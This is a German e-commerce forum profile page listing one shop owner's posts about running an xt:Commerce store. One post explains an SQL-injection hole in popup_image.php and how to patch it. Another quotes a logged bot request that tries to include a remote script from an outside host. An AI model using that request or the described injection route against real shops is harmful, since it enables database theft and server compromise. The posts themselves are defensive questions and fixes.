Jump to content
xt:Commerce Community Forum

marama

Members
  • Content Count

    196
  • Joined

  • Last visited

About marama

  • Rank
    Erfahrener Benutzer
  1. Vielleicht gibt's ja einen Sicherheitspatch, den ich nicht gefunden habe, in neueren Shopversionen könnte diese Lücke auch schon längst geschlossen sein: Über eine Lücke in inc/xtc_db_error.inc.php kann ein Angreifer kompletten Lesezugriff auf die Datenbank bekommen wenn er popup_image.php per SQL-Injection angreift. In dokumentierten Fällen wurden damit Kundendaten (Name, Vorname, email, verschlüsseltes Passwort) gestohlen. Zum Glück waren keine Zahlungsinformationen wie Bankdaten oder Kreditkartendaten in der Datenbank. Das Loch lässt sich ganz einfach schließen indem man in der Datei im Verzeichnis inc "xtc_db_error.inc.php" folgende Zeile die('<font color="#000000"><b>' . $errno . ' - ' . $error . '<br /><br />' . $query . '<br /><br /><small><font color="#ff0000">[XT SQL Error]</font></small><br /><br /></b></font>');[/PHP]durch [PHP]die('<font color="#000000"><b>Database error</b></font>');[/PHP]ersetzt.
  2. Hallo, wir hatten letzte Woche Hackerbesuch auf unserem Shop, ich befürchte sie waren erfolgreich. Sie scheinen keinen Zugriff per ftp oder ssh zu haben, aber möglicherweise die Datenbank lesen können. Im log finde ich folgendes (zu Hunderten): ... kann's nicht posten weil's die Forumssoftware sperrt. Jedenfalls greift ein GET auf popup_image.php zu. Mit korrekten Parametern für Produkt-id und Bildnummer, gefolgt von sql-Code.[/PHP]Wie erkenne ich ob die erfolgreich waren? Wenn ich die Zeile oben im Browser eingebe sehe ich nur das Produktbild... haben die mehr gesehen? Gibt es dafür einen Patch? Vielen Dank im voraus, snoopy
  3. Hallo, erfordert der Einsatz von Verified by Visa oder 3D-Secure irgendwelche Änderungen in Shopkonfiguration oder ipayment-Modul? Der Ablauf ist ja anders: Der Kunde wird nach seinem Passwort gefragt... läuft das für xt:C "unsichtbar" auf den ipayment-Seiten ab? Vielen Dank im voraus
  4. Hallo, bei uns sind in den letzten Wochen vermehrt Bestellungen mit offensichtlich gestohlenen Kreditkarten eingegangen. Sicherlich sind nicht nur wir Opfer von solchen Schweinchen... Diese Betrüger operieren in Banden und benutzen häufig identische Anlieferadressen: Da wo sie die Ware einfach und anonym abgreifen können. Was denkt ihr: Macht eine kleine Datensammlung hier Sinn? "Böse" email-Adressen und "böse" Adressdaten hier zu sammeln? Natürlich die email-Adressen ausreichend gekürzt und Adressdaten OHNE Namen des Bestellers. Selbstverständlich auch erst nur NACH dem Nachweis des Betruges. Als Beispiel die Bestellung von Heinz Muster Hauptstr. 123 12345 Musterstadt Lummerland email heinzmuster123@mailprovider.com aufzulisten als Lummerland, 12345 Musterstadt, Hauptstr. 123, heinzmust*@xxx.xxx Wäre das rechtlich wohl bedenklich? Bin gespannt wie ihr das -vor allem auch rechtlich- seht, ich könnte jedenfalls auf Anhieb 10 Adressen hier einpflegen
  5. Ich habe Veyton nur kurz getestet, zum Glück. Meine Nicht-Kauf-Entscheidung basierte damals darauf dass nie absehbar ist, wieviele Fehler drin stecken, wieviele Unzulänglichkeiten (Module die einfach nicht existieren oder eben nicht zu 100% passen) auszubügeln wären. Und dann in jedem Fall die Unsicherheit: Lässt sich der jeweilige Punkt überhaupt ausbügeln oder beißt man sich an irgendeinem codierten Teil die Zähne aus? Wir haben xtC mit SP2 am laufen und über die Monate und Jahre so viele Änderungen gemacht / machen müssen. Ausserdem viele Module dazuinstalliert und wieder für uns angepasst.... KO-Kriterium für Veyton das kaum ein Modulentwickler anpacken will. Tut mir leid zu hören dass der Support ebenfalls unzulänglich zu sein scheint. Aber auch das hat schon Geschichte: In den letzten Jahren haben xt:C-Benutzer hier Mitgliedsbeiträge bezahlt um im Forum Support zu bekommen... Support gab's nicht wirklich viel, schnellen Support auch nicht wirklich. Dafür wurde mit den Mitgliedsbeiträgen die Entwicklung von Veyton -das wir jetzt auch teuer kaufen dürfen- finanziert!!! Ich glaube dass die Idee Veyton scheitern wird. Auf dem Segment 'Shopsystem kaufen' gibt es genügend Anbieter die mehr oder weniger Leistung zu vergleichbaren Preisen oder auch deutlich günstiger anbieten. Vielleicht auch bug-ärmer. Das Zugpferd open-source das xt:C so attraktiv gemacht hat ist mit veyton unberechenbar geworden und wird nicht nur mich abschrecken. Schade dass xt:C mit draufgehen wird weil die Resourcen offensichtlich auf Null gesetzt wurden und keine Weiterentwicklung mehr da sein wird. Was hat ein Forenmitglied mir per PM geschrieben als ich ihn nach einem Modul gefragt habe: "ich mache für xt:C-Kunden schon lange keine Arbeiten mehr. Magento ist das kommende Shopsystem". Was ich an Deinen 32 bugs zusätzlich schade finde: Mit dem ersten Veyton-Update das Du mitmachen willst kannst Du wieder von vorne anfangen Trotzdem viel Erfolg, marama
  6. Hallo, bei mir marschiert gerade ein bot durch den Shop der alle Seiten mit /reviews.php?language=fr/////admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://indo.home.ro/idscan.txt??? auf allen Seiten durchrackert. Ich nehme an das ist ein hacker... auf welche Sicherheitslücke zielt der ab? Sollte ich da eine bestimmte Lücke nochmal prüfen? Vielen Dank, Martina Nachtrag: Die http://indo.home.ro/idscan.txt enthält
  7. Hallo, gibt es ein Versandmodul das GLS unterstützt und - GLS Versandaufkleber mit Barcode selbst ausdruckt - die damit wohl selbstverwaltete Trackingnummer in die Versandstatus-email packt? Andere Versender (DHL) genauso erwünscht da wir mit dem GLS Versand in einzelne Länder nicht glücklich sind... Vielen Dank, Martina
  8. Suche einen Grafiker für das Layout meines zweiten Shops. Der aktuelle Shop ist 3.0.4, SP1, jetziges Template basiert weitgehend auf aac_sky_template, siehe http://www.marama-kinderartikel.de Interessenten bitte mit grober Kostenvorstellung und Referenzen per PM, dann auch gerne weitere Informationen zum Shopthema. Danke im voraus, Martina
  9. Hi... erstmal vielen Dank für die contribution!!! Funktioniert prima und die Anleitung ist perfekt und vollständig. Das Problem mit dem Leerzeichen ist schon verstanden, auch klar, dass man das von Hand ändern kann. Ist allerdings a.) mühselig, vor allem wenn man die sitemap als .gz ablegt b.) zu spät, wenn man &ping=true angegeben hat. Dann ist google u.U. schon auf dem Weg zu der Datei bevor man das Leerzeichen gelöscht hat. Könnte man nicht beim Schreiben des Headers in einen flush einfügen? Oder die Datei mit irgendeinem flag öffnen damit sie wirklich leer ist? Würde das tool von SEHRGUT nach PERFEKT verschieben :-)
×
×
  • Create New...